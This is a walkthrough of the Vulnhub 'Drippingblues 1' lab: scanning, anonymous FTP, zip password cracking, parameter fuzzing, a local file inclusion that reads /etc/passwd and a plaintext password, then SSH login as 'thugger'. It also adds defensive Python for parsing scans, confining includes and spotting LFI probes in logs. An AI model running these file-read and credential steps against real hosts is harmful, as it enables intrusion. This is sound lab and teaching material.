Vulnhub: Drippingblues 1, a detailed walkthrough

Drippingblue

Identify IP Address of Target

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

Using netdiscover, the target host's IP address is identified as 192.168.56.123.

NMAP Scanning

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.123 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 00:34 EDT
Nmap scan report for localhost (192.168.56.123)
Host is up (0.0020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.101
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:E6:24:10 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
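The scan above already holds the three facts the rest of the walkthrough builds on: anonymous FTP is allowed, the file on it is world-writable, and robots.txt discloses two paths. As an added example, not part of the original write-up, the Python below parses Nmap's normal (-oN) output into per-port records and turns those NSE script lines into defender-facing findings. SAMPLE_SCAN is a constructed excerpt modelled on the output shown; the finding rules are mine, not Nmap's.

```python
"""Added example: turn Nmap -oN output into defender-facing findings.
Not part of the original write-up; SAMPLE_SCAN is a constructed excerpt
modelled on the scan shown above."""
import re

SAMPLE_SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
"""

# "21/tcp open  ftp     vsftpd 3.0.3"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script output lines begin with "| " or "|_"
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")
# directory entry flagged by the ftp-anon script: perms ... name [NSE: writeable]
WRITEABLE_RE = re.compile(r"^(\S{10})\s.*?(\S+)\s+\[NSE: writeable\]$")


def parse_nmap(text):
    """Return one dict per port line, with the NSE lines that follow it."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(),
                          "script": []})
            continue
        m = SCRIPT_RE.match(line)
        if m and ports:
            ports[-1]["script"].append(m.group(1).strip())
    return ports


def findings(ports):
    """Map NSE output to (port, finding) tuples a reviewer would act on."""
    out = []
    for p in ports:
        robots_next = False
        for s in p["script"]:
            if robots_next:  # the line after the http-robots.txt header lists the paths
                out.append((p["port"], "robots.txt discloses paths: " + s))
                robots_next = False
            if s.startswith("ftp-anon:") and "Anonymous FTP login allowed" in s:
                out.append((p["port"], "anonymous FTP login enabled"))
            m = WRITEABLE_RE.match(s)
            if m:
                perms, name = m.groups()
                # perms[8] is the "other" write bit of an ls-style mode string
                scope = "world-writable" if perms[8] == "w" else "writable"
                out.append((p["port"], f"{scope} file {name} exposed over FTP"))
            if s.startswith("http-robots.txt:"):
                robots_next = True
    return out


if __name__ == "__main__":
    for port, text in findings(parse_nmap(SAMPLE_SCAN)):
        print(f"{port}/tcp: {text}")
```

Run against a real `-oN` file the same way (`parse_nmap(open(path).read())`); each finding here maps to a concrete fix on the host (disable anonymous login in vsftpd, drop the world-writable bit, and stop listing sensitive paths in robots.txt).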

Enumeration

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ftp 192.168.56.123                                         
Connected to 192.168.56.123.
220 (vsFTPd 3.0.3)
Name (192.168.56.123:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||5213|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||43217|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 19  2021 .
drwxr-xr-x    2 0        0            4096 Sep 19  2021 ..
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||11871|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |********************************|   471      679.41 KiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (449.17 KiB/s)
ftp> quit
221 Goodbye.
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ls
nmap_full_scan  respectmydrip.zip
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip respectmydrip.zip  
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 

The FTP service allows anonymous access, and respectmydrip.zip can be downloaded from it, but the archive is password-protected.

Let's see whether the password can be cracked.

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip 


PASSWORD FOUND!!!!: pw == 072528035

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip respectmydrip.zip 
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 
 extracting: respectmydrip.txt       
  inflating: secret.zip              
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ls
nmap_full_scan  respectmydrip.txt  respectmydrip.zip  secret.zip
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip secret.zip         
Archive:  secret.zip
[secret.zip] secret.txt password:                                                                              

After extraction there is yet another encrypted archive, secret.zip. Trying to crack it the same way fails.

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secret.zip       
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ 

These should be usernames: travisscott, thugger.

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/robots.txt   
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/dripisreal.txt
hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ gobuster dir -u http://192.168.56.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.123
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/16 05:16:05 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
                                               
===============================================================
2022/10/16 05:16:33 Finished
===============================================================
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ dirb http://192.168.56.123              

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Oct 16 05:17:01 2022
URL_BASE: http://192.168.56.123/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.123/ ----
+ http://192.168.56.123/index.php (CODE:200|SIZE:138)
+ http://192.168.56.123/robots.txt (CODE:200|SIZE:78)                       
+ http://192.168.56.123/server-status (CODE:403|SIZE:279)                   
                                                                               
-----------------
END_TIME: Sun Oct 16 05:17:03 2022
DOWNLOADED: 4612 - FOUND: 3

Recall that robots.txt lists /etc/dripispowerful.html, a path under /etc rather than under the web root.

That suggests index.php may include files by name, i.e. a file inclusion vulnerability. The parameter name is unknown, so brute-force it with ffuf, filtering out the 138-byte response that index.php returns when the parameter is ignored.

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ffuf -ic -c -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://192.168.56.123/index.php?FUZZ=/etc/passwd' -fs 138

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.123/index.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 138
________________________________________________

:: Progress: [40/220547] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: :: Progress: [686/220547] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :

The parameter name turns out to be drip.

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/index.php?drip=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:128:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>          

The response also confirms that the target host has a user named thugger.
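The response above (index.php?drip=/etc/passwd returning the password file, followed by the page's own HTML) is what a script produces when it includes whatever path a request parameter names. The box's index.php source is not shown, so that shape of the vulnerable code is an assumption. The following is an added Python example, not the box's PHP, that contrasts an unconfined resolver with one that confines the include to a web root and to an allowlist; `unsafe_resolve`, `safe_resolve`, `ALLOWED_PAGES` and the temporary files are all constructed for the demonstration.

```python
"""Added example: unconfined vs. confined file inclusion. Python stand-in for
the assumed include($_GET['drip']) pattern; not the box's own code."""
import os
import tempfile
from pathlib import Path

# Page names the application is actually meant to serve (constructed allowlist).
ALLOWED_PAGES = {"home.html", "about.html"}


def unsafe_resolve(webroot, name):
    """Assumed shape of the vulnerable behaviour: the parameter is used as a
    path with no check. os.path.join discards webroot entirely when name is
    absolute, and '../' segments walk out of it."""
    return os.path.join(webroot, name)


def safe_resolve(webroot, name, allowed=ALLOWED_PAGES):
    """Return the file to include, or None when the request must be refused.

    Two independent controls: the resolved target must stay inside webroot
    (defeats absolute paths, '../' and symlinks), and the bare name must be on
    an allowlist (catches anything the containment check did not anticipate).
    """
    root = Path(webroot).resolve()
    target = (root / name).resolve()   # a leading '/' or '..' in name escapes root here
    if root not in target.parents:
        return None
    if name not in allowed:
        return None
    return str(target)


def demo():
    """Build a throwaway web root and exercise both resolvers (constructed)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "www"
        root.mkdir()
        (root / "home.html").write_text("<p>home</p>\n")
        (Path(tmp) / "secret.txt").write_text("outside the web root\n")
        return {
            "unsafe_absolute": unsafe_resolve(str(root), "/etc/passwd"),
            "unsafe_traversal": unsafe_resolve(str(root), "../secret.txt"),
            "safe_absolute": safe_resolve(str(root), "/etc/passwd"),
            "safe_traversal": safe_resolve(str(root), "../secret.txt"),
            "safe_not_allowlisted": safe_resolve(str(root), "drippin.jpg"),
            "safe_ok": safe_resolve(str(root), "home.html"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22} -> {value}")
```

The containment check alone already stops both the absolute path and the traversal shown on this page; the allowlist is what stops a request for a file that legitimately lives under the web root but was never meant to be included (an image, a config backup). Keeping both means a mistake in one does not become a file read.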

robots.txt also mentioned /etc/dripispowerful.html.

Request that file through the drip parameter as well.

Its page source is:

<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}

@font-face {
    font-family: Segoe;
    src: url('segoeui.ttf');
}

.mainfo {
  text-align: center;
  border: 1px solid #000000;
  font-family: 'Segoe';
  padding: 5px;
  background-color: #ffffff;
  margin-top: 300px;
}

.emoji {
	width: 32px;
	}
</style>
password is:
imdrippinbiatch
</body>
</html>

<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>

This reveals a password: imdrippinbiatch
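Seen from the defender's side, both steps on this page (the ffuf parameter brute-force and the drip=/etc/passwd request) leave a recognisable trace in the Apache access log. The following is an added example, not from the original post: a small detector over constructed combined-format log lines that flags query values that look like file paths and clients that cycle through many parameter names against one URL. SAMPLE_LOG, the user-agent strings and the fuzz_threshold value are constructed for the demonstration.

```python
"""Added example: spot LFI probing and parameter fuzzing in Apache access logs.
Not part of the original write-up; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-format lines: five ffuf-style guesses, the working
# parameter, a URL-encoded traversal, and two benign requests from another host.
SAMPLE_LOG = """\
192.168.56.101 - - [16/Oct/2022:05:16:05 -0400] "GET /index.php?admin=/etc/passwd HTTP/1.1" 200 138 "-" "ffuf/1.5.0"
192.168.56.101 - - [16/Oct/2022:05:16:05 -0400] "GET /index.php?file=/etc/passwd HTTP/1.1" 200 138 "-" "ffuf/1.5.0"
192.168.56.101 - - [16/Oct/2022:05:16:05 -0400] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 138 "-" "ffuf/1.5.0"
192.168.56.101 - - [16/Oct/2022:05:16:06 -0400] "GET /index.php?view=/etc/passwd HTTP/1.1" 200 138 "-" "ffuf/1.5.0"
192.168.56.101 - - [16/Oct/2022:05:16:06 -0400] "GET /index.php?drip=/etc/passwd HTTP/1.1" 200 3120 "-" "ffuf/1.5.0"
192.168.56.101 - - [16/Oct/2022:05:16:40 -0400] "GET /index.php?drip=/etc/dripispowerful.html HTTP/1.1" 200 712 "-" "curl/7.85.0"
192.168.56.101 - - [16/Oct/2022:05:16:41 -0400] "GET /index.php?drip=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 3120 "-" "curl/7.85.0"
10.0.0.5 - - [16/Oct/2022:05:17:00 -0400] "GET /index.php?drip=home HTTP/1.1" 200 138 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Oct/2022:05:17:01 -0400] "GET /robots.txt HTTP/1.1" 200 78 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access-log line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # decodes %xx once
    return rec


def looks_like_file_path(value):
    """Absolute paths or parent-directory traversal, after a second decode
    so that double-encoded '%252e%252e/' is caught as well."""
    v = unquote(value)
    return v.startswith("/") or "../" in v or "..\\" in v


def scan(lines, fuzz_threshold=5):
    """Return alert tuples: ('lfi-probe', ip, path, param, value) per request,
    plus ('param-fuzzing', ip, path, n_names) per client/URL pair that tried
    at least fuzz_threshold distinct parameter names."""
    alerts = []
    names_seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            names_seen[(rec["ip"], rec["path"])].add(name)
            if looks_like_file_path(value):
                alerts.append(("lfi-probe", rec["ip"], rec["path"], name, unquote(value)))
    for (ip, path), names in names_seen.items():
        if len(names) >= fuzz_threshold:
            alerts.append(("param-fuzzing", ip, path, len(names)))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```

The per-request rule fires on the successful read as well as on every unsuccessful guess, which is the point: on this box the guesses all returned the same 138-byte page, so response size alone would not have separated them from normal traffic, whereas a query value beginning with `/` or containing `../` is almost never legitimate.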

Exploit

┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ssh thugger@192.168.56.123
The authenticity of host '192.168.56.123 (192.168.56.123)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.123' (ED25519) to the list of known hosts.
thugger@192.168.56.123's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)
thugger@drippingblues:~$ 

thugger@drippingblues:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 102048 11688 ?        Ss   07:30   0:00 /sbin/init splash
root           2  0.0  0.0      0     0 ?        S    07:30   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   07:30   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   07:30   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   07:30   0:00 [kworker/0:0H-events_highpri]
root           9  0.0  0.0      0     0 ?        I<   07:30   0:00 [mm_percpu_wq]
root          10  0.0  0.0      0     0 ?        S    07:30   0:00 [rcu_tasks_rude_]
root          11  0.0  0.0      0     0 ?        S    07:30   0:00 [rcu_tasks_trace]
root          12  0.0  0.0      0     0 ?        S    07:30   0:00 [ksoftirqd/0]
root          13  0.0  0.0      0     0 ?        I    07:30   0:00 [rcu_sched]
root          14  0.0  0.0      0     0 ?        S    07:30   0:00 [migration/0]
root          15  0.0  0.0      0     0 ?        S    07:30   0:00 [idle_inject/0]
root          16  0.0  0.0      0     0 ?        S    07:30   0:00 [cpuhp/0]
root          17  0.0  0.0      0     0 ?        S    07:30   0:00 [kdevtmpfs]
root          18  0.0  0.0      0     0 ?        I<   07:30   0:00 [netns]
root          19  0.0  0.0      0     0 ?        I<   07:30   0:00 [inet_frag_wq]
root          20  0.0  0.0      0     0 ?        S    07:30   0:00 [kauditd]
root          21  0.0  0.0      0     0 ?        S    07:30   0:00 [khungtaskd]
root          22  0.0  0.0      0     0 ?        S    07:30   0:00 [oom_reaper]
root          23  0.0  0.0      0     0 ?        I<   07:30   0:00 [writeback]
root          24  0.0  0.0      0     0 ?        S    07:30   0:00 [kcompactd0]
root          25  0.0  0.0      0     0 ?        SN   07:30   0:00 [ksmd]
root          26  0.0  0.0      0     0 ?        SN   07:30   0:00 [khugepaged]
root          72  0.0  0.0      0     0 ?        I<   07:30   0:00 [kintegrityd]
root          73  0.0  0.0      0     0 ?        I<   07:30   0:00 [kblockd]
root          74  0.0  0.0      0     0 ?        I<   07:30   0:00 [blkcg_punt_bio]
root          75  0.0  0.0      0     0 ?        I<   07:30   0:00 [tpm_dev_wq]
root          76  0.0  0.0      0     0 ?        I<   07:30   0:00 [ata_sff]
root          77  0.0  0.0      0     0 ?        I<   07:30   0:00 [md]
root          78  0.0  0.0      0     0 ?        I<   07:30   0:00 [edac-poller]
root          79  0.0  0.0      0     0 ?        I<   07:30   0:00 [devfreq_wq]
root          80  0.0  0.0      0     0 ?        S    07:30   0:00 [watchdogd]
root          82  0.0  0.0      0     0 ?        I<   07:30   0:00 [kworker/0:1H-kblockd]
root          84  0.0  0.0      0     0 ?        S    07:30   0:00 [kswapd0]
root          85  0.0  0.0      0     0 ?        S    07:30   0:00 [ecryptfs-kthrea]
root          87  0.0  0.0      0     0 ?        I<   07:30   0:00 [kthrotld]
root          88  0.0  0.0      0     0 ?        I<   07:30   0:00 [acpi_thermal_pm]
root          89  0.0  0.0      0     0 ?        S    07:30   0:00 [scsi_eh_0]
root          90  0.0  0.0      0     0 ?        I<   07:30   0:00 [scsi_tmf_0]
root          91  0.0  0.0      0     0 ?        S    07:30   0:00 [scsi_eh_1]
root          92  0.0  0.0      0     0 ?        I<   07:30   0:00 [scsi_tmf_1]
root          94  0.0  0.0      0     0 ?        I<   07:30   0:00 [vfio-irqfd-clea]
root          95  0.0  0.0      0     0 ?        I<   07:30   0:00 [ipv6_addrconf]
root         105  0.0  0.0      0     0 ?        I<   07:30   0:00 [kstrp]
root         108  0.0  0.0      0     0 ?        I<   07:30   0:00 [zswap-shrink]
root         109  0.0  0.0      0     0 ?        I<   07:30   0:00 [kworker/u3:0]
root         114  0.0  0.0      0     0 ?        I<   07:30   0:00 [charger_manager]
root         136  0.0  0.0      0     0 ?        I    07:30   0:03 [kworker/0:2-events]
root         157  0.0  0.0      0     0 ?        S    07:30   0:00 [scsi_eh_2]
root         159  0.0  0.0      0     0 ?        I<   07:30   0:00 [scsi_tmf_2]
root         181  0.0  0.0      0     0 ?        S    07:30   0:00 [jbd2/sda5-8]
root         182  0.0  0.0      0     0 ?        I<   07:30   0:00 [ext4-rsv-conver]
root         222  0.0  0.4  68304 18156 ?        S<s  07:30   0:00 /lib/systemd/systemd-journald
root         243  0.0  0.0      0     0 ?        S    07:30   0:00 [irq/18-vmwgfx]
root         248  0.0  0.0      0     0 ?        I<   07:30   0:00 [ttm_swap]
root         249  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc0]
root         250  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc1]
root         252  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop0]
root         255  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc2]
root         257  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc3]
root         258  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop1]
root         261  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc4]
root         262  0.0  0.1  24136  7620 ?        Ss   07:30   0:00 /lib/systemd/systemd-udevd
root         263  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop2]
root         264  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc5]
root         265  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc6]
root         266  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop3]
root         267  0.0  0.0      0     0 ?        S    07:30   0:00 [card0-crtc7]
root         268  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop4]
root         269  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop5]
root         274  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop6]
root         275  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop7]
root         276  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop8]
root         277  0.0  0.0      0     0 ?        S<   07:30   0:00 [loop9]
root         312  0.0  0.0      0     0 ?        I<   07:30   0:00 [cryptd]
systemd+     501  0.0  0.3  24060 12192 ?        Ss   07:30   0:00 /lib/systemd/systemd-resolved
systemd+     502  0.0  0.1  90424  6372 ?        Ssl  07:30   0:00 /lib/systemd/systemd-timesyncd
root         533  0.0  0.2 244632  9648 ?        Ssl  07:30   0:00 /usr/lib/accountsservice/accou
root         534  0.0  0.0   2548   776 ?        Ss   07:30   0:00 /usr/sbin/acpid
avahi        537  0.0  0.0   8508  3504 ?        Ss   07:30   0:00 avahi-daemon: running [drippin
root         538  0.0  0.0  12156  3128 ?        Ss   07:30   0:00 /usr/sbin/cron -f
message+     540  0.0  0.1   8784  5892 ?        Ss   07:30   0:00 /usr/bin/dbus-daemon --system 
root         541  0.0  0.5 341100 21852 ?        Ssl  07:30   0:00 /usr/sbin/NetworkManager --no-
root         550  0.0  0.5  41992 20184 ?        Ss   07:30   0:00 /usr/bin/python3 /usr/bin/netw
root         552  0.0  0.2 239120 11636 ?        Ssl  07:30   0:00 /usr/lib/policykit-1/polkitd -
syslog       554  0.0  0.1 224332  4664 ?        Ssl  07:30   0:00 /usr/sbin/rsyslogd -n -iNONE
root         563  0.0  0.7 630280 29316 ?        Ssl  07:30   0:00 /usr/lib/snapd/snapd
root         564  0.0  0.1 238344  5928 ?        Ssl  07:30   0:00 /usr/libexec/switcheroo-contro
root         566  0.0  0.2  17064  8328 ?        Ss   07:30   0:00 /lib/systemd/systemd-logind
